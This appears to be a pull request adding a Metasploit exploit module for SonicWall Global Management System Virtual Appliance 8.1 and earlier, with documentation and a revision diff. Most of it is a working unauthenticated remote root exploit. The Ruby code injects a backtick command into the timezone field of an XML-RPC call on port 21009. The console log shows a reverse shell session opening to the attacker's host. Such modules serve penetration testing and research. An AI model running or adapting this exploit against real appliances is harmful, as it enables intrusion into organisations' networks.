### PR TITLE
Add SonicWall XML-RPC Remote Code Execution exploit module

### DIFF
--- a/documentation/modules/exploit/unix/sonicwall/sonicwall_xmlrpc_rce.md
+++ b/documentation/modules/exploit/unix/sonicwall/sonicwall_xmlrpc_rce.md
@@ -1,0 +1,110 @@
+sonicwall_xmlrpc_rce is a remote exploit against SonicWall Global Management
+System Virtual Appliance and is written by Michael Flanders of Trend
+Micro Zero Day Initiative with assistance by @kernelsmith of Trend Micro Zero
+Day Initiative. It is considered a reliable exploit, and allows you to remotely
+execute commands as root.
+
+## Vulnerable Application
+
+* This exploit works against a vulnerable SonicWall Global Management System
+Virtual Appliance (A.K.A. Sonicwall GMSVP) of versions 8.1 (Build 8110.1197) and
+earlier. The virtual appliance can be downloaded here:
+  * http://www.sonicwall.com/products/sonicwall-gms/
+
+* This module exploits the virtual appliance's lack of checking on user-supplied
+parameters to XML-RPC calls to a vulnerable Java service running on port 21009.
+A call to a shell script is made using this user-supplied parameter contained in
+backticks allowing command substitution and remote code execution.
+
+* To reliably determine whether the target virtual appliance is vulnerable,
+you will have to examine the web console's login page. This is also automatically
+done in the check function of the exploit.
+
+## Verification Steps
+
+- [x] Start `msfconsole`
+- [x] `use exploit/unix/sonicwall/sonicwall_xmlrpc_rce`
+- [x] `set RHOST` to the IP address of the vulnerable virtual appliance
+- [x] `set RPORT` to 21009
+- [x] `set payload` to the desired payload
+- [x] set any additional options for the payload e.g. LHOST/LPORT
+- [x] `exploit`
+- [x] **Verify** that you get a shell
+- [x] **Verify** that you do not crash
+
+## Options
+
+```
+set SSL [true/false]
+```
+
+* Set this true/false depending on whether the instance of SonicWall GMSVP has
+been configured to use SSL.
+
+
+```
+set WEB_SERVER_PORT [port]
+```
+
+* This is the port of the login page for the web server/virtual appliance. For
+SonicWall GMVSP this is typically http://[ip]:80; therefore, this option is set
+by default to 80 (or 443 if `set SSL true`).
+
+## Scenarios
+
+* This is example output from a normal usage/scenario. This console output is for
+SonicWall GMSVP version 8.0 (Build 8046.1396):
+
+```
+msf > use exploit/unix/sonicwall/sonicwall_xmlrpc_rce
+msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > show options
+
+Module options (exploit/unix/sonicwall/sonicwall_xmlrpc_rce):
+
+   Name             Current Setting  Required  Description
+   ----             ---------------  --------  -----------
+   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST                             yes       The target address
+   RPORT            80               yes       The target port (TCP)
+   SSL              false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                             no        HTTP server virtual host
+   WEB_SERVER_PORT                   no        Port of web console login page.
+                                             Defaults to 80/443 depending on SSL.
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   SonicWall Global Management System Virtual Appliance
+
+
+msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set RPORT 21009
+RPORT => 21009
+
+msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set RHOST 192.168.152.173
+RHOST => 192.168.152.173
+
+msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set payload cmd/unix/reverse
+payload => cmd/unix/reverse
+
+msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set LHOST 192.168.152.193
+LHOST => 192.168.152.193
+
+msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > exploit
+
+[*] Started reverse TCP double handler on 192.168.152.193:4444
+[*] The target appears to be vulnerable, continuing exploit...
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo H7sn3KYXeuCZy27Q;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "H7sn3KYXeuCZy27Q\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 1 opened (192.168.152.193:4444 -> 192.168.152.173:44698) at 2018-07-05 12:30:56 -0400
+```
+

--- a/modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb
+++ b/modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb
@@ -6,9 +6,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name' => "SonicWall Global Management System Virtual Appliance
-                 DispatcherHandler set_time_zone Unauthenticated
-                 Remote Command Injection Vulnerability",
+      'Name' => "SonicWall Global Management System XMLRPC
+                 set_time_zone Unath RCE",
       'Description' => %q{
         This module exploits a vulnerability in SonicWall Global
         Management System Virtual Appliance versions 8.1 (Build 8110.1197)
@@ -50,8 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
         [
           OptString.new('WEB_SERVER_PORT', [ false, 'Port of web console login page.
                                              Defaults to 80/443 depending on SSL.'])
-        ], self.class
-      )
+        ])
   end
 
   def check
@@ -63,25 +61,24 @@ class MetasploitModule < Msf::Exploit::Remote
 
     handler = datastore['SSL'] ? 'https' : 'http'
 
-    res = request_url("#{handler}://#{datastore['RHOST']}:#{port_number}")
-    if res && res.code == 200
-      if res.body =~ /<TITLE>.+v(\d\.\d)/
-        maj_ver, min_ver = $1.split('.').map { |x| x.to_i }
-        if maj_ver <= 7
-          Exploit::CheckCode::Vulnerable
-        elsif maj_ver >= 8
-          if min_ver <= 1
-            Exploit::CheckCode::Vulnerable
-          else
-            Exploit::CheckCode::Safe
-          end
-        end
-      else
-        Exploit::CheckCode::Unknown
-      end
-    else
-      Exploit::CheckCode::Unknown
+    res = request_url("#{handler}://#{rhost}:#{port_number}")
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
     end
+
+    unless res.code == 200 && res.body =~ /<TITLE>.+v(\d\.\d)/
+      return CheckCode::Safe
+    end
+
+    version = Gem::Version.new $1.to_s
+
+    unless version <= Gem::Version.new('8.1')
+      return CheckCode::Safe
+    end
+
+    CheckCode::Appears
   end
 
 
@@ -112,25 +109,22 @@ class MetasploitModule < Msf::Exploit::Remote
       'method'  => 'POST',
       'uri'     => '/',
       'data'    => xml_body,
-      'headers' => {
-        'Content-Type' => 'text/xml'
-      }
+      'ctype'   => 'text/xml; charset=UTF-8'
     })
 
-    unless res || res.body =~ /success/
-      print_error("Error sending XML to #{datastore['RHOST']}#{datastore['RPORT']}")
+    unless res && res.body.include?("success")
+      print_error("Error sending XML to #{rhost}:#{rport}")
     end
   end
 
   def exploit
-    vulnerability_status = check
-
-    if vulnerability_status && (vulnerability_status != Exploit::CheckCode::Safe)
-      print_status("The target appears to be vulnerable, continuing exploit...")
-      send_xml
-    else
-      print_error("The target does not appear to be vulnerable. Aborting...")
+    unless check == CheckCode::Appears
+      fail_with Failure::NotVulnerable, "The target is not vulnerable."
     end
+
+    print_status "The target appears to be vulnerable, continuing exploit..."
+    send_xml
   end
+
 end
 

--- a/modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb
+++ b/modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb
@@ -1,0 +1,136 @@
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name' => "SonicWall Global Management System Virtual Appliance
+                 DispatcherHandler set_time_zone Unauthenticated
+                 Remote Command Injection Vulnerability",
+      'Description' => %q{
+        This module exploits a vulnerability in SonicWall Global
+        Management System Virtual Appliance versions 8.1 (Build 8110.1197)
+        and below. This virtual appliance can be downloaded from
+        http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a
+        holistic way to manage your entire network security environment.'
+
+        These vulnerable versions (8.1 Build 8110.1197 and below) do not
+        prevent unauthenticated, external entities from making XML-RPC
+        requests to port 21009 of the virtual app. After the XML-RPC call
+        is made, a shell script is called like so:
+        'timeSetup.sh --tz="`command injection here`"' --usentp="blah"'.
+      },
+      'License' => MSF_LICENSE,
+      'Author' => [ 'Michael Flanders', #MSF Module
+                    'kernelsmith' #Advisor
+                  ],
+      'References' => [
+        ['URL', 'https://www.digitaldefense.com/digital-defense/vrt-discoveries/'],
+        ['URL', 'https://slides.com/kernelsmith/bsidesaustin2018/#/']
+      ],
+      'Platform' => [ 'unix' ],
+      'Arch' => ARCH_CMD,
+      'Targets' => [
+        [ 'SonicWall Global Management System Virtual Appliance', {} ],
+      ],
+      'Payload' => {
+        # Can't use ampersand, Java's XML-RPC parser will complain and return an error
+        'BadChars' => "\x26",
+         'Compat' => {
+           'PayloadType' => 'cmd',
+           'RequiredCmd' => 'generic bash telnet'
+         }
+      },
+      'DisclosureDate' => "Jul 22 2016",
+      'DefaultTarget' => 0))
+
+      register_options(
+        [
+          OptString.new('WEB_SERVER_PORT', [ false, 'Port of web console login page.
+                                             Defaults to 80/443 depending on SSL.'])
+        ], self.class
+      )
+  end
+
+  def check
+    if datastore['WEB_SERVER_PORT']
+      port_number = datastore['WEB_SERVER_PORT']
+    else
+      port_number = datastore['SSL'] ? '443' : '80'
+    end
+
+    handler = datastore['SSL'] ? 'https' : 'http'
+
+    res = request_url("#{handler}://#{datastore['RHOST']}:#{port_number}")
+    if res && res.code == 200
+      if res.body =~ /<TITLE>.+v(\d\.\d)/
+        maj_ver, min_ver = $1.split('.').map { |x| x.to_i }
+        if maj_ver <= 7
+          Exploit::CheckCode::Vulnerable
+        elsif maj_ver >= 8
+          if min_ver <= 1
+            Exploit::CheckCode::Vulnerable
+          else
+            Exploit::CheckCode::Safe
+          end
+        end
+      else
+        Exploit::CheckCode::Unknown
+      end
+    else
+      Exploit::CheckCode::Unknown
+    end
+  end
+
+
+
+  def send_xml
+    xml_body = <<~HERESTRING
+    <?xml version="1.0" encoding="UTF-8"?>
+    <methodCall>
+      <methodName>set_time_config</methodName>
+      <params>
+        <param>
+          <value>
+            <struct>
+              <member>
+                <name>timezone</name>
+                <value>
+                  <string>"`#{payload.encoded}`"</string>
+                </value>
+              </member>
+            </struct>
+          </value>
+        </param>
+      </params>
+    </methodCall>
+    HERESTRING
+
+    res = send_request_raw({
+      'method'  => 'POST',
+      'uri'     => '/',
+      'data'    => xml_body,
+      'headers' => {
+        'Content-Type' => 'text/xml'
+      }
+    })
+
+    unless res || res.body =~ /success/
+      print_error("Error sending XML to #{datastore['RHOST']}#{datastore['RPORT']}")
+    end
+  end
+
+  def exploit
+    vulnerability_status = check
+
+    if vulnerability_status && (vulnerability_status != Exploit::CheckCode::Safe)
+      print_status("The target appears to be vulnerable, continuing exploit...")
+      send_xml
+    else
+      print_error("The target does not appear to be vulnerable. Aborting...")
+    end
+  end
+end
+


### PR DESCRIPTION
sonicwall_xmlrpc_rce is a remote exploit against SonicWall Global Management
System Virtual Appliance and is written by Michael Flanders of Trend
Micro Zero Day Initiative with assistance by @kernelsmith of Trend Micro Zero
Day Initiative. It is considered a reliable exploit, and allows you to remotely
execute commands as root.

## Vulnerable Application

* This exploit works against a vulnerable SonicWall Global Management System
Virtual Appliance (A.K.A. Sonicwall GMSVP) of versions 8.1 (Build 8110.1197) and
earlier. The virtual appliance can be downloaded here:
  * http://www.sonicwall.com/products/sonicwall-gms/

* This module exploits the virtual appliance's lack of checking on user-supplied
parameters to XML-RPC calls to a vulnerable Java service running on port 21009.
A call to a shell script is made using this user-supplied parameter contained in
backticks allowing command substitution and remote code execution.

* To reliably determine whether the target virtual appliance is vulnerable,
you will have to examine the web console's login page. This is also automatically
done in the check function of the exploit.

## Verification Steps

- [ ] Start `msfconsole`
- [ ] `use exploit/unix/sonicwall/sonicwall_xmlrpc_rce`
- [ ] `set RHOST` to the IP address of the vulnerable virtual appliance
- [ ] `set RPORT` to 21009
- [ ] `set payload` to the desired payload
- [ ] set any additional options for the payload e.g. LHOST/LPORT
- [ ] `exploit`
- [ ] **Verify** that you get a shell
- [ ] **Verify** that you do not crash

## Options

```
set SSL [true/false]
```

* Set this true/false depending on whether the instance of SonicWall GMSVP has
been configured to use SSL.


```
set WEB_SERVER_PORT [port]
```

* This is the port of the login page for the web server/virtual appliance. For
SonicWall GMVSP this is typically http://[ip]:80; therefore, this option is set
by default to 80 (or 443 if `set SSL true`).

## Scenarios

* This is example output from a normal usage/scenario. This console output is for
SonicWall GMSVP version 8.0 (Build 8046.1396):

```
msf > use exploit/unix/sonicwall/sonicwall_xmlrpc_rce
msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > show options

Module options (exploit/unix/sonicwall/sonicwall_xmlrpc_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                             yes       The target address
   RPORT            80               yes       The target port (TCP)
   SSL              false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                             no        HTTP server virtual host
   WEB_SERVER_PORT                   no        Port of web console login page.
                                             Defaults to 80/443 depending on SSL.


Exploit target:

   Id  Name
   --  ----
   0   SonicWall Global Management System Virtual Appliance


msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set RPORT 21009
RPORT => 21009

msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set RHOST 192.168.152.173
RHOST => 192.168.152.173

msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set payload cmd/unix/reverse
payload => cmd/unix/reverse

msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set LHOST 192.168.152.193
LHOST => 192.168.152.193

msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > exploit

[*] Started reverse TCP double handler on 192.168.152.193:4444
[*] The target appears to be vulnerable, continuing exploit...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo H7sn3KYXeuCZy27Q;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "H7sn3KYXeuCZy27Q\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.152.193:4444 -> 192.168.152.173:44698) at 2018-07-05 12:30:56 -0400
```

## MSFTidy output:

* All issues have been fixed.

```
michael:metasploit-framework michael$ ./tools/dev/msftidy.rb ./modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb
michael:metasploit-framework michael$
```